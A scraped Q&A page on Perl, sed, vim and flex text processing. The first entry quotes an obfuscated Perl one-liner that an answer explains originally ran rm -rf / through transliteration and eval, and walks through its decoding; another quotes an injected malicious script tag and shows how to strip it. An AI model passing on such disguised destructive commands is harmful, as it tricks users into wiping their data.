Perl specific code - perl

The following program is in Perl.
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-#[-`{-};`-{/" -;;s;;$_;see'
Can somebody help me to understand how it works?

This bit of code's already been asked about on the Debian forums.
According to Lacek, the moderator on that thread, what the code originally did is rm -rf /, though they mention they've changed the version there so that people trying to figure out how it works don't delete their entire filesystem. There's also an explanation there of what the various parts of the Perl code do.
(Did you post this knowing what it did, or were you unaware of it?)
To quote Lacek's post on it:
Anyway, here is how the script works.
It is basically two regex substitutions and one transliteration.
Piping anything into its standard input makes no difference, the perl
code doesn't use its input in any way. If you split the long line on
the boundaries of the expressions, you get this:
$??s:;s:s;;$?::
s;;=]=>%-{\\>%<-{;;
y; -/:-#[-`{-};`-{/" -;;
s;;$_;see
The first line is a condition which does nothing save makes the code
look more difficult. If the previous command originated from the perl
code wasn't successful, it does some substitutions on the standard
input (which the program doesn't use, so effectively it substitutes
the nothing). Since no previous command exists, $? is always 0, so the
first line never gets executed.
The second line substitutes the
standard input (the nothing) for seemingly meaningless garbage.
The third line is a transliteration operator. It defines 4 ranges, in
which the characters gets substituted to the one range and the 4
characters given in the transliteration replacement. I'd prefer not to
write the whole transliteration table here, because it's a bit long.
If you are really interested, just write the characters in the defined
ranges (space to '/', ':' to '#', '[' to '(backtick)', and '{' to '}'), and
write next to them the characters from the replacement range ('(backtick)' to
'{'), and finally, write the remaining characters (/,", space and -)
from the replacement pattern. When you have this table, you can see
what character gets replaced to what.
The last line executes the
resulting command by substituting the nothing with the resulted string
(which is 'xterm'. Originally it was 'system"rm -rf /"', and is held
in $_), evaluates the substitution as an expression and executes it.
(I've substituted 'backtick' for the actual backtick character here so that the code auto-formatting doesn't kick in.)
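For readers who would rather not write the table out by hand, the transliteration step from the quoted explanation can be sketched in Python. This is only an illustration and not part of the original one-liner: the helper names expand and decode are made up here, and the sketch assumes the second search range was meant to run from ':' to '@' (':' to '#' does not ascend, so the '#' shown above looks like a transcription slip). It decodes only the harmless 'xterm' string from Lacek's version and never executes anything.

```python
def expand(spec):
    """Expand a tr-style character list such as ' -/' into its characters."""
    chars = []
    i = 0
    while i < len(spec):
        # "a-z" is a range only if a character follows the dash;
        # a trailing dash is taken literally.
        if i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return "".join(chars)


# Assumption: second range is ':' to '@' (see the note above).
SEARCH = " -/:-@[-`{-}"
REPLACEMENT = '`-{/" -'

TABLE = str.maketrans(expand(SEARCH), expand(REPLACEMENT))


def decode(text):
    """Apply the transliteration table to text."""
    return text.translate(TABLE)


# The "garbage" string from the modified (xterm) version of the script.
ENCODED = r"=]=>%-{\>%<-{"
print(decode(ENCODED))  # system"xterm"
```

Both expanded lists come out at 32 characters, which is why every character in the search ranges has exactly one replacement.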

Related

Print strings alongside math results in s// substitution with the /e modifier

I am trying to write a very simple one liner to find cases of:
foo N
and replace them with
foo N-Y
For example, if I had 3 files and they had the following lines in them:
foo 5
foo 3
foo 9
After the script is run with Y=4, the lines would read:
foo 1
foo -1
foo 5
I stumbled upon an existing thread that suggested using /e to run code in the replace half of the substitute command and was able to effectively subtract Y from all my matches, but I have no idea how to best print "foo" back into the file since when I try to separate foo and the number into two capture groups and print them back in, perl thinks I am trying to multiply them and wants an operator.
Here's where I'm at:
find . -iname "*somematch*" -exec perl -pi -e 's/(Foo *)(\d+)/$1$2-4/e' {} \;
Of course this doesn't work; Perl reports 'Scalar found where operator expected at -e line 1, near "$1$2"'. I'm at a loss as to how best to proceed without writing something much longer.
Edit: To be more specific, if I have the /e option enabled to be able to perform math in the substitution, is there a simple way to print the string in another capture group in that substitution without it trying to do math to it?
Alternatively, is there a simple way to surgically perform the substitution on only part of the pattern? I tried to combine m// and s/// to achieve the results but ended up getting nowhere.
The replacement part is treated as code under /e, so it needs to be written using legal syntax, like you'd use in a program. Writing $t$v isn't legal syntax ($1$2 in your regex).
One way to concatenate strings is $t . $v. Then you also need parentheses around the subtraction, since otherwise, by precedence rules, the strings $1 and $2 are concatenated first and the subtraction is then attempted on that alphanumeric string, drawing a warning. So
perl -i -pe's/(Foo *)([0-9]+)/$1.($2-4)/e'
I replaced \d with [0-9] since \d matches all kinds of "digits" from all over Unicode, which doesn't seem to be what you need.
There is another way if the math comes after the rest of the pattern, as it does in your examples
perl -i -pe's/Foo *\K([0-9]+)/$1-4/e'
Here \K behaves like a variable-length positive lookbehind: everything matched before it is dropped from the match, so it is left untouched by the substitution. Thus only the [0-9]+ is replaced, as needed.
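The same idea (run code in the replacement, then glue the untouched prefix back on) can be sketched in Python, where re.sub accepts a function in place of a replacement string. This is an illustrative analogue rather than the Perl answer itself: the function name subtract_from_foo and the offset parameter are made up for the example, and the pattern uses lowercase foo to match the sample data.

```python
import re


def subtract_from_foo(line, offset=4):
    """Replace 'foo N' with 'foo N-offset', keeping the 'foo ' prefix as-is."""
    def replace(match):
        prefix, number = match.group(1), int(match.group(2))
        # Concatenate the captured prefix with the computed number,
        # the Python counterpart of $1.($2-4) under /e.
        return prefix + str(number - offset)

    return re.sub(r"(foo *)([0-9]+)", replace, line)


for sample in ["foo 5", "foo 3", "foo 9"]:
    print(subtract_from_foo(sample))
# foo 1
# foo -1
# foo 5
```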

How do I use sed to modify a file?

I have a question about using sed to modify file. My file content:
<data-value name="WLS_INSTALL_DIR" value="/home/Oracle/wlserver_10.3">
I want to replace the content of field value="/home/Oracle/wlserver_10.3"
to get this result:
<data-value name="WLS_INSTALL_DIR" value="/u03/Middle_home/Oracle/wlserver_10.3">
I use sed:
sed "6 i/^value=/>/s/value= />\(.*\)/value=\"\/u03\/Oracle/Middleware/wlserver_10.3"\" \/\ /u03/silent.xml
Your sed script has a number of issues.
First off, anything that looks like 6istuff will simply write everything after i ("insert") verbatim as a new line before the sixth line. (Some dialects require a newline after the i and will basically do nothing.)
Secondly, ^value= does not match your input; it would only select a line starting with the string value= (the ^ metacharacter means beginning of line).
Thirdly, the /> in your substitution regex terminates the substitution and so everything from > onwards is parsed as invalid flags for the substitution. I cannot see the purpose of this part, anyway; it doesn't match your data, and so the regex fails.
What remains after removing all these superfluous and erroneous details is a more or less useful sed script. (I assume the 6 to address only the sixth line of input is intentional, although you don't mention this in the question at all.) I have made some additional minor improvements, such as using % as the substitution delimiter and tightening the regex so that it only ever substitutes a double-quoted value.
sed '6s%value="[^"]*"%value="/u03/Oracle/Middleware/wlserver_10.3"%' /u03/silent.xml
Better than 6 would perhaps be to identify the line with /name="WLS_INSTALL_DIR"/.
Still, as alluded to in a comment, the proper way to manipulate XML is with a dedicated tool such as xsltproc.
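As a rough illustration of selecting the line by name="WLS_INSTALL_DIR" rather than by line number, here is a small Python sketch. It is a line-based text edit just like the sed command, not a real XML tool, and the function name set_install_dir is invented for the example.

```python
import re


def set_install_dir(text, new_dir):
    """Rewrite value="..." on lines that carry name="WLS_INSTALL_DIR"."""
    result = []
    for line in text.splitlines(keepends=True):
        if 'name="WLS_INSTALL_DIR"' in line:
            # Only a double-quoted value is replaced, and only once per line.
            # A function is used so new_dir is inserted literally.
            line = re.sub(r'value="[^"]*"',
                          lambda m: 'value="%s"' % new_dir,
                          line, count=1)
        result.append(line)
    return "".join(result)


sample = '<data-value name="WLS_INSTALL_DIR" value="/home/Oracle/wlserver_10.3">\n'
print(set_install_dir(sample, "/u03/Middle_home/Oracle/wlserver_10.3"), end="")
```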
Try:
sed 's|/home|/u03/Middle_home|'

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
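The range address used in the sed command above (start deleting at the opening comment, stop after the closing comment) can be sketched in Python as follows. This is an illustration only: the function name delete_block is made up, and it matches the markers as plain substrings rather than as regular expressions.

```python
def delete_block(lines, start_marker, end_marker):
    """Drop every line from start_marker through end_marker, inclusive."""
    kept = []
    inside = False
    for line in lines:
        if not inside and start_marker in line:
            inside = True      # the opening line itself is deleted
            continue
        if inside:
            if end_marker in line:
                inside = False  # the closing line is deleted too
            continue
        kept.append(line)
    return kept


page = [
    "var a = 1;\n",
    "/*123456*/\n",
    "document.write('...');\n",
    "\n",
    "/*/123456*/\n",
    "var b = 2;\n",
]
print("".join(delete_block(page, "/*123456*/", "/*/123456*/")), end="")
# var a = 1;
# var b = 2;
```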
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; standard sed has no relative line offsets (/x/+1 is not allowed, let alone /x/-1; GNU sed accepts addr,+N as an extension, but nothing that reaches backwards). At that point, you probably fall back on ed (or perhaps ex):
ed - "$file" <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.
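For comparison, the relative-offset deletion that ed performs can be sketched in Python. The name delete_around and its before/after parameters are invented for this example; unlike ed, which reports an error when an address falls outside the file, this sketch simply clamps the range at the first and last line.

```python
def delete_around(lines, needle, before=1, after=2):
    """Delete each line containing needle plus its neighbouring lines."""
    doomed = set()
    for index, line in enumerate(lines):
        if needle in line:
            first = max(0, index - before)
            last = min(len(lines) - 1, index + after)
            doomed.update(range(first, last + 1))
    return [line for index, line in enumerate(lines) if index not in doomed]


page = [
    "var a = 1;\n",
    "/*123456*/\n",
    "document.write('<script src=\"http://maliciousurl.com/asdf\"></script>');\n",
    "\n",
    "/*/123456*/\n",
    "var b = 2;\n",
]
print("".join(delete_around(page, "maliciousurl.com")), end="")
# var a = 1;
# var b = 2;
```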

Make sed not buffer by lines

I'm not trying to prevent sed from block-buffering! I am looking to get it to not even line-buffer.
I am not sure if this is even possible at all.
Basically there is a big difference between the behavior of sed and that of cat when interacting with them from a raw pseudo-terminal: cat will immediately spit back the inserted characters when it receives them over STDIN, while sed even in raw mode will not.
A thought experiment could be carried out: given a simple sed command such as s/abc/zzz/g, sending a stream of input to sed like 123ab means that sed at best can provide over standard output the characters 123, because it does not yet know if a c will arrive and cause the result string to be 123zzz, while any other character would have it print exactly what came in (allowing it to "catch up", if you will). So in a way it's obvious why cat does respond immediately; it can afford to.
So of course that's how it would work in an ideal world where sed's authors actually cared about this kind of a use case.
I suspect that that is not the case. In reality, through my not too terribly exhaustive methods, I see that sed will line buffer no matter what (which allows it to always be able to figure out whether to print the 3 z's or not), unless you tell it that you care about matching your regexes past/over newlines, in which case it will just buffer the whole damn thing before providing any output.
My ideal solution is to find a sed that will spit out all the text that it has already finished parsing, without waiting till the end of line to do so. In my little example above, it would instantly spit back the characters 1, 2, and 3, and while a and b are being entered (typed), it says nothing, till either a c is seen (prints zzz), or any other character X is seen, in which case abX is printed, or in the case of EOF ab is printed.
Am I SOL? Should I just incrementally implement my Perl code with the features I want, or is there still some chance that this sort of magically delicious functionality can be got through some kind of configuration?
See another question of mine for more details on why I want this.
One potential workaround is to manually establish groups of input to "split" across calls to sed (or, in my case, since I'm already dealing with a Perl script, Perl's regex replacement operators) so that I can do the flushing by hand. But this cannot achieve the same level of responsiveness, because it would require me to think through the expression to describe the points at which the "buffering" is to occur, rather than having a regex parser do it automatically.
There is a tool that matches an input stream against multiple regular expressions in parallel and acts as soon as it decides on a match. It's not sed. It's lex. Or the GNU version, flex.
To make this demonstration work, I had to define a YY_INPUT macro, because flex was line-buffering input by default. Even with no buffering at the stdio level, and even in "interactive" mode, there is an assumption that you don't want to process less than a line at a time.
So this is probably not portable to other versions of lex.
%{
#include <stdio.h>
/* Read one character at a time so flex never waits for a full line. */
#define YY_INPUT(buf,result,max_size) \
    { \
        int c = getchar(); \
        result = (c == EOF) ? YY_NULL : (buf[0] = c, 1); \
    }
%}
%%
abc     fputs("zzz", stdout); fflush(stdout);
.       fputs(yytext, stdout); fflush(stdout);
%%
int main(void)
{
    setbuf(stdin, 0);   /* no stdio buffering on input */
    yylex();
    return 0;
}
Usage: put that program into a file called abczzz.l and run
flex --always-interactive -o abczzz.c abczzz.l
cc abczzz.c -ll -o abczzz
for ch in a b c 1 2 3 ; do echo -n $ch ; sleep 1 ; done | ./abczzz ; echo
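The behaviour asked for in the question (emit everything that can no longer be part of a match, hold back only a possible prefix of abc) can also be sketched in a few lines of Python. This is a toy for a single literal pattern, not a regex engine and not what flex does internally; the generator name stream_replace is made up for the example.

```python
def stream_replace(chars, pattern="abc", replacement="zzz"):
    """Yield output pieces as soon as they are decided, one input char at a time."""
    held = ""
    for ch in chars:
        held += ch
        # Release leading characters until the held text could still
        # grow into the pattern (i.e. it is a prefix of it).
        while held and not pattern.startswith(held):
            yield held[0]
            held = held[1:]
        if held == pattern:
            yield replacement
            held = ""
    if held:
        yield held  # end of input: flush the unfinished partial match


print(list(stream_replace("123ab")))   # ['1', '2', '3', 'ab']
print("".join(stream_replace("abX")))  # abX
print("".join(stream_replace("abc")))  # zzz
```

With the input 123ab, the characters 1, 2 and 3 are released immediately, while ab is held until either a c arrives or the input ends.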
You can actually write entire programs in sed.
Here is a way to slurp the whole file into the editing buffer. I added -n to suppress automatic printing and $p so that the buffer is printed only at the end, after I swap the hold space I have been building up with the pattern space I am editing.
sed -n 'H;$x;$p' FILENAME
You can conditionally build up the hold space based on patterns you encounter:
'/pattern/{H}'
You can conditionally print the buffer as well
'/pattern/{p}'
You can even nest these conditional blocks, if you feel saucy.
You could use a combination of g (to copy the hold space to the pattern space, thereby overwriting it) and then s/\(.\).*/\1/ and such to get at individual characters.
I hope this was at least informative. I would advise you to write a tool in a different language.

How to reformat a source file to go from 2 space indentations to 3?

This question is nearly identical to this question except that I have to go to three spaces (company coding guidelines) rather than four and the accepted solution will only double the matched pattern. Here was my first attempt:
:%s/^\(\s\s\)\+/\1 /gc
But this does not work because four spaces get replaced by three. So I think that what I need is some way to get the count of how many times the pattern matched "+" and use that number to create the other side of the substitution but I feel this functionality is probably not available in Vim's regex (Let me know if you think it might be possible).
I also tried doing the substitution manually by replacing the largest indents first and then the next smaller indent until I got it all converted but this was hard to keep track of the spaces:
:%s/^ \(\S\)/ \1/gc
I could send it through Perl as it seems like Perl might have the ability to do it with its Extended Patterns. But I could not get it to work with my version of Perl. Here was my attempt with trying to count a's:
:%!perl -pe 'm<(?{ $cnt = 0 })(a(?{ local $cnt = $cnt + 1; }))*aaaa(?{ $res = $cnt })>x; print $res'
My last resort will be to write a Perl script to do the conversion but I was hoping for a more general solution in Vim so that I could reuse the idea to solve other issues in the future.
Let vim do it for you?
:set sw=3<CR>
gg=G
The first command sets the shiftwidth option, which is how much you indent by. The second line says: go to the top of the file (gg), and reindent (=) until the end of the file (G).
Of course, this depends on vim having a good formatter for the language you're using. Something might get messed up if not.
Regexp way... Safer, but less understandable:
:%s#^\(\s\s\)\+#\=repeat(' ',strlen(submatch(0))*3/2)#g
(I had to do some experimentation.)
Two points:
If the replacement starts with \=, it is evaluated as an expression.
You can use many things instead of /, so / is available for division.
The perl version you asked for...
From the command line (edits in-place, no backup):
bash$ perl -pi -e 's{^((?:  )+)}{"   " x (length($1)/2)}e' YOUR_FILE
(in-place, original backed up to "YOUR_FILE.bak"):
bash$ perl -pi.bak -e 's{^((?:  )+)}{"   " x (length($1)/2)}e' YOUR_FILE
From vim while editing YOUR_FILE:
:%!perl -pe 's{^((?:  )+)}{"   " x (length($1)/2)}e'
The regex matches the beginning of the line, followed by (the captured set of) one or more "two space" groups. The substitution pattern is a perl expression (hence the 'e' modifier) which counts the number of "two space" groups that were captured and creates a string of that same number of "three space" groups. If an "extra" space was present in the original it is preserved after the substitution. So if you had three spaces before, you'll have four after, five before will turn into seven after, etc.
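The same substitution can be sketched in Python to make the arithmetic explicit. The function name reindent and its old/new parameters are invented for this illustration; the behaviour is meant to mirror the Perl expression, including the preserved "extra" space.

```python
import re


def reindent(line, old=2, new=3):
    """Turn each leading group of `old` spaces into `new` spaces."""
    def widen(match):
        groups = len(match.group(0)) // old   # number of old-width groups
        return " " * (new * groups)

    # Only whole groups at the start of the line are matched, so an odd
    # trailing space is left in place after the widened indentation.
    return re.sub(r"^(?: {%d})+" % old, widen, line)


for sample in ["  if x:", "    y = 1", "   odd", "none"]:
    print(repr(reindent(sample)))
# '   if x:'
# '      y = 1'
# '    odd'
# 'none'
```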